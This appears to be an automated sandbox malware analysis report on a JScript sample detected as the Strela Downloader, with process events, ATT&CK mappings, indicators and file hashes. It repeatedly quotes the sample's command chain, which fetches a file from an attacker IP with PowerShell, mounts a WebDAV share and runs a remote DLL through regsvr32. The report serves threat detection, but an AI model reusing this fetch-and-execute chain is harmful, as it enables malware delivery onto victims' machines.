    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeCOM call: HKEY_CURRENT_USER\Control Panel\International\LocaleJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4216Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5261Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep count: 4216 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424Thread sleep count: 5261 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -11068046444225724s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\net.exe TID: 4368Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 5900Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: wscript.exe, 00000000.00000002.2215820612.000001B016010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}-,
    Source: net.exe, 00000007.00000002.2333983828.0000012D8E1F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3503486723.000001D2FCC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3501891898.000001D2FB62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: net.exe, 00000007.00000002.2333983828.0000012D8E198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    22
    Scripting
    11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    131
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook1
    Obfuscated Files or Information
    NTDS131
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync122
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589905 Sample: 2165116371124411090.js Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 41 Sigma detected: Powershell launch regsvr32 2->41 43 Yara detected Strela Downloader 2->43 45 Sigma detected: WScript or CScript Dropper 2->45 47 2 other signatures 2->47 9 wscript.exe 1 1 2->9         started        12 svchost.exe 1 1 2->12         started        process3 dnsIp4 51 JScript performs obfuscated calls to suspicious functions 9->51 53 Wscript starts Powershell (via cmd or directly) 9->53 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->55 57 3 other signatures 9->57 15 cmd.exe 3 2 9->15         started        39 127.0.0.1 unknown unknown 12->39 signatures5 process6 signatures7 59 Suspicious powershell command line found 15->59 61 Wscript starts Powershell (via cmd or directly) 15->61 63 Gathers information about network shares 15->63 18 powershell.exe 14 16 15->18         started        22 cmd.exe 1 15->22         started        25 Acrobat.exe 75 15->25         started        27 conhost.exe 15->27         started        process8 dnsIp9 37 193.143.1.205 BITWEB-ASRU unknown 18->37 35 C:\Users\user\AppData\Local\...\invoice.pdf, PDF 18->35 dropped 49 Gathers information about network shares 22->49 29 net.exe 1 22->29         started        31 AcroCEF.exe 109 25->31         started        file10 signatures11 process12 process13 33 AcroCEF.exe 2 31->33         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    2165116371124411090.js7%VirustotalBrowse
    2165116371124411090.js3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://193.143.1.205/invoice.phpwscript.exe, 00000000.00000002.2215820612.000001B016010000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000009.00000003.2335785912.000001D2FCA50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drfalse
        high
        http://crl.ver)svchost.exe, 00000009.00000002.3503554480.000001D2FCC85000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D.8.drfalse
            high
            https://g.live.com/odclientsettings/Prod1C:qmgr.db.9.drfalse
              high
              http://193.143.1.205:8888/net.exe, 00000007.00000002.2333983828.0000012D8E1EA000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2333983828.0000012D8E198000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2333983828.0000012D8E1CB000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://193.143.1.205:8888/snet.exe, 00000007.00000002.2333983828.0000012D8E198000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.143.1.205
                  unknownunknown
                  57271BITWEB-ASRUtrue
                  IP
                  127.0.0.1
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1589905
                  Start date and time:2025-01-13 10:12:12 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (Javascript)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:2165116371124411090.js
                  Detection:MAL
                  Classification:mal100.rans.spyw.expl.evad.winJS@27/45@0/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .js
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 2.22.50.144, 2.22.50.131, 23.209.209.135, 2.22.242.123, 2.22.242.136, 2.23.197.184, 2.16.168.107, 2.16.168.105, 2.22.242.11, 23.200.0.33, 23.200.0.21, 192.168.2.6, 13.107.253.45, 20.12.23.50, 52.6.155.20, 23.47.168.24
                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  04:13:21API Interceptor21x Sleep call for process: powershell.exe modified
                  04:13:25API Interceptor1x Sleep call for process: net.exe modified
                  04:13:26API Interceptor2x Sleep call for process: svchost.exe modified
                  04:13:33API Interceptor2x Sleep call for process: AcroCEF.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.143.1.20529522576223272839.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  1329220172182926612.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  2816632483050917528.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  29112223682907312977.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  179861427815317256.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  16910148382611315301.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  281388015101323984.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  305861283730376077.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  155442583088718889.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  14444181562539231561.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205:8888/
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  BITWEB-ASRU29522576223272839.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  1528915004169812209.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  1329220172182926612.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  2816632483050917528.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  29112223682907312977.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  1178918864369817238.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  179861427815317256.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  16910148382611315301.jsGet hashmaliciousStrela DownloaderBrowse
                  • 193.143.1.205
                  byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
                  • 193.143.1.66
                  byte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                  • 193.143.1.66
                  No context
                  No context
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1310720
                  Entropy (8bit):0.7263199904850965
                  Encrypted:false
                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0h:9JZj5MiKNnNhoxug
                  MD5:212AC7777298A5B90AE092204B6B9B4D
                  SHA1:895D686FEB9772631D8EB5E72E2E8CAC29697712
                  SHA-256:B13E87621B85F7C844814A86E15C2FB44F79B98E9B4EDD45C20356B4287CD455
                  SHA-512:96542F50535C66F38945160365951DFE19ACBA8A7CC13492A302374BF53F5AF89653B039F021DDD4537E33CC2F0FA42F88628B40C77626839A604C14A6522D28
                  Malicious:false
                  Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage user DataBase, version 0x620, checksum 0xcbd2cd9e, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):1310720
                  Entropy (8bit):0.7555839871187919
                  Encrypted:false
                  SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                  MD5:9495488F8351D2331184C153F7835D3D
                  SHA1:ADE414165C3C0181D0D69C3217833BAF3CDAED21
                  SHA-256:FC34C664000FC9CD1C4B2CCC474EA3BEDDAD5EEAAF86156F2BE4B4AC6230B611
                  SHA-512:7CCD6F52863EEFDF956A92000635B318EA4BBEA38D29765920223B7CDE684A0D9889D911C84E79D951CA92A65B60C0CAF0A158EBDAD95A00900A3FF39E3AA9D5
                  Malicious:false
                  Preview:...... .......7.......X\...;...{......................0.e......!...{?......};.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................A......}.................+.;5.....};..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.07944236420307607
                  Encrypted:false
                  SSDEEP:3:mptKYeIuR80jluNaAPaU1lokY8/ltolluxmO+l/SNxOf:mDKz/R80BuNDPaUwR8tGgmOH
                  MD5:80423CEF8899A50B2DE4C14574C60521
                  SHA1:4621A8B66A4CDE085F578CF946381A145F5A3663
